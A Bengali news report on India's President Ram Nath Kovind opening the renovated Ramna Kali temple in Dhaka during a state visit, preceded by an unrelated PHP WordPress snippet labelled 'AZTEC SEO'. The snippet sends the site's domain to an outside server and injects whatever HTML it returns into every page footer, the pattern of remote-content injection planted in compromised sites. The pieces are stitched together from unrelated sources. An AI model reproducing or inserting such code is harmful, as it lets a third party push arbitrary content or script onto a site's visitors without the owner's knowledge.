/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ঢাকায় সফররত ভারতের রাষ্ট্রপতি রাম নাথ কোবিন্দ উদ্বোধন করলেন অনেক ইতিহাসের সাক্ষী রমনা কালী মন্দিরের নতুন ভবন ও সম্প্রসারিত অংশ। পরে তিনি আরাধনায়ও অংশ নেন। মন্দিরে আগমনের সময় শাঁখ বাজিয়ে সনাতন ধর্মীয় রীতিতে অভিবাদন জানানো হয় ভারতের রাষ্ট্রপ্রতিকে।
শুক্রবার সকাল সাড়ে ১০টারয় স্ত্রী সবিতা কোবিন্দ ও মেয়ে স্বাতী কোবিন্দকে নিয়ে মন্দির প্রাঙ্গণে পৌঁছান ভারতের রাষ্ট্রপতি। সেখানে তাদের স্বাগত জানান ধর্মপ্রতিমন্ত্রী ফরিদুল হক খান।
ভারতীয় নেতা কালী মন্দিরের সংস্কার হওয়া অংশের ফলক উন্মোচন করেন এবং পরে স্ত্রী ও মেয়েকে সঙ্গে নিয়ে দেবী প্রতিমার সামনে পূজা দেন। প্রার্থনা শেষে মন্দির প্রাঙ্গণে উপস্থিত মন্দির কমিটির সদস্য এবং হিন্দু সম্প্রদায়ের প্রতিনিধিদের সঙ্গে কুশল বিনিময় করেন কোবিন্দ। ভারতের রাষ্ট্রপতি ১৫ মিনিটের মতো সময় রমনা কালী মন্দিরে অবস্থান করেন । এরপর সেখান থেকে ফিরে যান হোটেলে।
বাংলাদেশের স্বাধীনতার সুবর্ণজয়ন্তী ও মুজিববর্ষের সমাপনী অনুষ্ঠানে যোগ দিতে স্ত্রী-কন্যাকে নিয়ে ৩ দিনের রাষ্ট্রীয় সফরে বুধবার সকালে ঢাকায় পৌঁছান ভারতের রাষ্ট্রপতি কোবিন্দ। সফর শেষ করে শুক্রবার দুপুরেই দিল্লির উদ্দেশে ঢাকা ত্যাগ করবেন তিনি।